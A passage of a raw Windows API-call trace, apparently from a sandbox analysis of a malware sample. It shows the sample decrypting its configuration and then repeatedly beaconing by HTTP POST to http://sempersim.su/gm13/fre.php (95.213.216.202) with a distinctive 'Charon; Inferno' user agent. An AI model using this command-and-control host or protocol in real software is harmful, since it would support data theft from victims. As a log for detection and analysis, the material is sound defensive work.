(HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0212.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0212.722] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0212.725] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0212.727] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0212.730] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.736] GetProcessHeap () returned 0x620000 [0212.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0212.736] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.737] GetProcessHeap () returned 0x620000 [0212.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0212.738] GetProcessHeap () returned 0x620000 [0212.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0212.738] GetProcessHeap () returned 0x620000 [0212.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0212.739] GetProcessHeap () returned 0x620000 [0212.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0212.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.740] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.766] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0212.776] GetProcessHeap () returned 0x620000 [0212.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0212.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.777] CryptImportKey (in: hProv=0x63ba08, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0212.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.778] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.778] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.779] GetProcessHeap () returned 0x620000 [0212.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0212.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.780] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0212.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.781] CryptDestroyKey (hKey=0x62d710) returned 1 [0212.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.782] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0212.782] GetProcessHeap () returned 0x620000 [0212.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0212.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0212.783] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0212.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0212.784] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0212.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0212.785] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0212.785] GetProcessHeap () returned 0x620000 [0212.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0212.785] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c550*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0212.786] GetProcessHeap () returned 0x620000 [0212.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b560 [0212.786] socket (af=2, type=1, protocol=6) returned 0x380 [0212.787] connect (s=0x380, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0212.841] FreeAddrInfoW (pAddrInfo=0x63c550*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0212.841] GetProcessHeap () returned 0x620000 [0212.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0212.841] GetProcessHeap () returned 0x620000 [0212.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0212.841] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0212.842] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0212.842] GetProcessHeap () returned 0x620000 [0212.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0212.842] GetProcessHeap () returned 0x620000 [0212.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0212.843] GetProcessHeap () returned 0x620000 [0212.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642e58 [0212.843] GetProcessHeap () returned 0x620000 [0212.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0212.843] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0212.844] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0212.844] GetProcessHeap () returned 0x620000 [0212.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0212.844] GetProcessHeap () returned 0x620000 [0212.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0212.845] send (s=0x380, buf=0x63a880*, len=237, flags=0) returned 237 [0212.845] send (s=0x380, buf=0x6421e0*, len=159, flags=0) returned 159 [0212.845] GetProcessHeap () returned 0x620000 [0212.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0212.845] recv (in: s=0x380, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0213.686] GetProcessHeap () returned 0x620000 [0213.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0213.687] GetProcessHeap () returned 0x620000 [0213.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0213.687] GetProcessHeap () returned 0x620000 [0213.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0213.687] GetProcessHeap () returned 0x620000 [0213.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0213.687] closesocket (s=0x380) returned 0 [0213.689] GetProcessHeap () returned 0x620000 [0213.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b560 | out: hHeap=0x620000) returned 1 [0213.689] GetProcessHeap () returned 0x620000 [0213.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0213.690] GetProcessHeap () returned 0x620000 [0213.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0213.690] GetProcessHeap () returned 0x620000 [0213.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0213.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x354) returned 0x380 [0213.692] Sleep (dwMilliseconds=0xea60) [0213.699] GetProcessHeap () returned 0x620000 [0213.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0213.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.700] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.708] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0213.720] GetProcessHeap () returned 0x620000 [0213.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0213.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.721] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0213.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.722] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.723] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.723] GetProcessHeap () returned 0x620000 [0213.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0213.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.724] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0213.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.725] CryptDestroyKey (hKey=0x62d710) returned 1 [0213.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.726] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0213.726] GetProcessHeap () returned 0x620000 [0213.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0213.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0213.727] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0213.728] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0213.730] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0213.733] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.733] GetProcessHeap () returned 0x620000 [0213.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0213.733] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.734] GetProcessHeap () returned 0x620000 [0213.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0213.734] GetProcessHeap () returned 0x620000 [0213.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0213.734] GetProcessHeap () returned 0x620000 [0213.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0213.735] GetProcessHeap () returned 0x620000 [0213.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0213.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.736] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.745] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0213.752] GetProcessHeap () returned 0x620000 [0213.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0213.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.754] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0213.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.755] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.756] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.756] GetProcessHeap () returned 0x620000 [0213.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0213.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.757] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0213.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.758] CryptDestroyKey (hKey=0x62d710) returned 1 [0213.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0213.759] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0213.759] GetProcessHeap () returned 0x620000 [0213.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646998 [0213.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0213.763] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0213.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0213.764] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0213.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0213.765] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0213.765] GetProcessHeap () returned 0x620000 [0213.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0213.765] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c500*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0213.769] GetProcessHeap () returned 0x620000 [0213.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0213.769] socket (af=2, type=1, protocol=6) returned 0x384 [0213.769] connect (s=0x384, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0213.824] FreeAddrInfoW (pAddrInfo=0x63c500*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0213.824] GetProcessHeap () returned 0x620000 [0213.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0213.824] GetProcessHeap () returned 0x620000 [0213.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0213.825] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0213.826] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0213.826] GetProcessHeap () returned 0x620000 [0213.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0213.826] GetProcessHeap () returned 0x620000 [0213.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0213.827] GetProcessHeap () returned 0x620000 [0213.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643248 [0213.827] GetProcessHeap () returned 0x620000 [0213.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0213.828] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0213.829] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0213.829] GetProcessHeap () returned 0x620000 [0213.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0213.829] GetProcessHeap () returned 0x620000 [0213.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0213.830] send (s=0x384, buf=0x63a880*, len=237, flags=0) returned 237 [0213.831] send (s=0x384, buf=0x6421e0*, len=159, flags=0) returned 159 [0213.831] GetProcessHeap () returned 0x620000 [0213.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0213.831] recv (in: s=0x384, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0215.604] GetProcessHeap () returned 0x620000 [0215.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0215.605] GetProcessHeap () returned 0x620000 [0215.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0215.605] GetProcessHeap () returned 0x620000 [0215.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0215.606] GetProcessHeap () returned 0x620000 [0215.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0215.606] closesocket (s=0x384) returned 0 [0215.607] GetProcessHeap () returned 0x620000 [0215.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0215.607] GetProcessHeap () returned 0x620000 [0215.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646998 | out: hHeap=0x620000) returned 1 [0215.607] GetProcessHeap () returned 0x620000 [0215.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0215.607] GetProcessHeap () returned 0x620000 [0215.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0215.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa34) returned 0x384 [0215.609] Sleep (dwMilliseconds=0xea60) [0215.624] GetProcessHeap () returned 0x620000 [0215.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0215.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.632] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0215.646] GetProcessHeap () returned 0x620000 [0215.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0215.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.647] CryptImportKey (in: hProv=0x63ba08, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0215.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.648] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.649] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.649] GetProcessHeap () returned 0x620000 [0215.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0215.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.655] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0215.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.657] CryptDestroyKey (hKey=0x62d190) returned 1 [0215.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0215.658] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0215.658] GetProcessHeap () returned 0x620000 [0215.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0215.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0215.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0215.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0215.662] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0215.663] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.663] GetProcessHeap () returned 0x620000 [0215.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0215.663] getaddrinfo (in: 